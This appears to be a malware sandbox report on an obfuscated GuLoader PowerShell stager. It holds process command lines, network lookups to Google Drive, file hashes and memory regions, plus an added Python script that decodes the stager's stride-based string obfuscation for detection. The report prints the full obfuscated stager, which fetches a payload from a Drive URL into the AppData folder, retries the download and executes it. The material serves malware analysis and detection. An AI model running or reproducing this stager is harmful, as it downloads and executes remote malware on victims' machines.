Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. 
Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr 
S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso 
MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. 
Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 820 -ip 820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 820 -s 2360
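The two PowerShell command lines above are a GuLoader stager whose only obfuscation is the `Refrig213` function: with `$Superexcrescence = 1` and `$Necroscopic18` assembled as `'Substrin'+'g'`, it walks each quoted string from index 7 in steps of 8, keeps one character per step, and stops before the last character. `Medicinmands` is `. iex` (its `$Deviascope` argument decodes to `iex`), so every `Medicinmands (Refrig213 '...')` is a decoded statement being executed. The Python below is an added example, not part of the sandbox report: it reads the start index, stride and tail out of the `For` loop so it also works when another build of the stager changes them, checks that the assembled method is `Substring`, and decodes five literals copied verbatim from the command line above (the complete script is not embedded). The decoded `$Bundskrabets` is exactly the cmd.exe command line recorded in the process list, and `$Cereals148` decodes to the drive.google.com download URL behind the network rows.

```python
import re

# Fragments copied verbatim from the 64-bit powershell.exe command line in this
# report: the decoder function, its helper and five of the encoded literals.
STAGER_FRAGMENT = (
    r"$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';"
    r"Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;"
    r"For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8))"
    r"{$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}"
    r"function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}"
    r"$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';"
    r"$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';"
    r"$modularization=Refrig213 'Steelwo>Meddele ';"
    r"$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';"
    r"$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';"
)

# For($i=<start>; $i -lt $<limit>; $i+=(<step>))
LOOP_RE = re.compile(r"For\(\$\w+=(\d+);\s*\$\w+\s+-lt\s+\$\w+;\s*\$\w+\+=\(?(\d+)\)?\)")
TAIL_RE = re.compile(r"\.Length-\$(\w+)")                    # $limit = .Length - $tailVar
SPLIT_NAME_RE = re.compile(r"\$(\w+)='(\w+)';\$\1\+='(\w+)'")  # 'Substrin' + 'g'


def parse_decoder(script):
    """Recover (start, step, tail): the loop starts at `start`, advances by
    `step` and stops before Length - tail."""
    m = LOOP_RE.search(script)
    if not m:
        raise ValueError("stride loop not found")
    start, step = int(m.group(1)), int(m.group(2))
    tail = 0
    t = TAIL_RE.search(script)
    if t:
        a = re.search(r"\$" + re.escape(t.group(1)) + r"\s*=\s*(\d+)", script)
        if a:
            tail = int(a.group(1))
    return start, step, tail


def built_method_name(script):
    """The method called through .Invoke is assembled from two literals so the
    token Substring never appears in the command line."""
    m = SPLIT_NAME_RE.search(script)
    return m.group(2) + m.group(3) if m else None


def decode(blob, start=7, step=8, tail=1):
    """Equivalent of Refrig213: one character per stride, skipping the tail."""
    return "".join(blob[i] for i in range(start, len(blob) - tail, step))


def decode_literals(script):
    """Find every <decoder> '<literal>' call and return {variable: decoded}.
    Calls that are not assignments (the Medicinmands (...) statements) are
    keyed stmt_<n> in order of appearance."""
    start, step, tail = parse_decoder(script)
    if built_method_name(script) != "Substring":
        raise ValueError("unexpected character-extraction method")
    fn = re.search(r"Function\s+(\w+)\s*\(", script, re.I).group(1)
    lit_re = re.compile(r"(?:\$(\w+)\s*=\s*)?" + re.escape(fn) + r"\s+'([^']*)'")
    out = {}
    for n, (name, raw) in enumerate(lit_re.findall(script)):
        out[name or f"stmt_{n}"] = decode(raw, start, step, tail)
    return out


if __name__ == "__main__":
    print("decoder parameters (start, step, tail):", parse_decoder(STAGER_FRAGMENT))
    for name, value in decode_literals(STAGER_FRAGMENT).items():
        print(f"${name} = {value!r}")
```

Run it over the full command line (pasted into `STAGER_FRAGMENT` or read from a file) and the `stmt_<n>` entries come out as the second-stage PowerShell: the download to the `gennemsgnings.Fas` path, the while loop that retries the Drive URL, and the final `Medicinmands $Provivisection` call. Because the filler characters are real dictionary words, entropy-based detectors score this script as benign; the decoder parameters are the reliable fingerprint.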

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 fe699e7801de060d278808932c5fc6d2
SHA1 cefc085de999f6333d1d9c4659f8b6c39e5c2631
SHA256 6748e39a430292a4e2131e78930855a5352d4f28db60f5ce38c850e81ff5fd92
SHA512 d4b2ed06b608eb2389a8b34d8cb7a6c17aa32725f2834b8dd01d74c75c492cc5e72f133c7ffe7d6ec981fd830ea8faf4c00f3067b45e4b6fe8788fcaad6a176b

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 afc5e05f116fe2c4fcd104c0218ed209
SHA1 83d46b9bccfc9d3da86fff3b552600bdaff9aad0
SHA256 6e0fdd835f071ea9e34ba392b93e3fef994a53486aa5eab039127b3ae49024b3
SHA512 0e6200dc7d7eecc4e1bf3d7afd1ee4e03ff0334310147b82eb9fda145b6b81c3e4eb87c0bcf5d3a746816b0a929dc000fbab6daa7aea98341d56d2e589072d41

C:\Users\Admin\AppData\Local\Temp\Rundturens.txt

MD5 0daa8b536653bad441d95c2a2d0599e3
SHA1 21c8c8279bb40581e0667de6d15010f0bef0c206
SHA256 effc4e7de9249dba82434429fcc89b730f9d0d5e8064915673f2cccca995b098
SHA512 148daf06032180161585c7230393cbf62f20d3278da66ae8b19c67da7f39e2fe229ce94fb4ec8ada17353236aeeae6cd0e679bac0089034973be04d910fea509

memory/1396-311-0x000001DC3EA90000-0x000001DC3EAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cokylfm.4us.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-321-0x00007FFA92440000-0x00007FFA92F01000-memory.dmp

memory/1396-322-0x000001DC3EAF0000-0x000001DC3EB00000-memory.dmp

memory/1396-323-0x00007FFA92440000-0x00007FFA92F01000-memory.dmp

memory/1396-325-0x000001DC3EAF0000-0x000001DC3EB00000-memory.dmp

memory/1396-326-0x000001DC3EAF0000-0x000001DC3EB00000-memory.dmp

memory/820-328-0x0000000002C60000-0x0000000002C96000-memory.dmp

memory/820-329-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/820-330-0x00000000058B0000-0x0000000005ED8000-memory.dmp

memory/820-331-0x00000000056C0000-0x00000000056E2000-memory.dmp

memory/820-332-0x0000000005760000-0x00000000057C6000-memory.dmp

memory/820-333-0x00000000057D0000-0x0000000005836000-memory.dmp

memory/820-343-0x0000000005F90000-0x00000000062E4000-memory.dmp

memory/820-344-0x0000000006590000-0x00000000065AE000-memory.dmp

memory/820-345-0x00000000065D0000-0x000000000661C000-memory.dmp

memory/820-346-0x0000000007DF0000-0x000000000846A000-memory.dmp

memory/820-347-0x0000000006B20000-0x0000000006B3A000-memory.dmp

memory/820-348-0x0000000007840000-0x00000000078D6000-memory.dmp

memory/820-349-0x00000000077D0000-0x00000000077F2000-memory.dmp

memory/820-350-0x0000000008A20000-0x0000000008FC4000-memory.dmp

C:\Users\Admin\AppData\Roaming\gennemsgnings.Fas

MD5 eef3f42f8568ec1d96e3fc1a3174c27f
SHA1 b58f1fae7aeb4f69389a46d62fb110c5bf0b39a2
SHA256 f87d719b62b1b6a582ae647b47dcb70855495c65307cc786ebaf1580a7f1628e
SHA512 f386755db46e2454711107f92c6ebc47dbfb50d047ddc296304703223928f5a1e8a6156e05e1544e2fd9b07cf63a5fdf54a16ce3010f650670c828f8ee4d37dc

memory/820-352-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/1396-355-0x00007FFA92440000-0x00007FFA92F01000-memory.dmp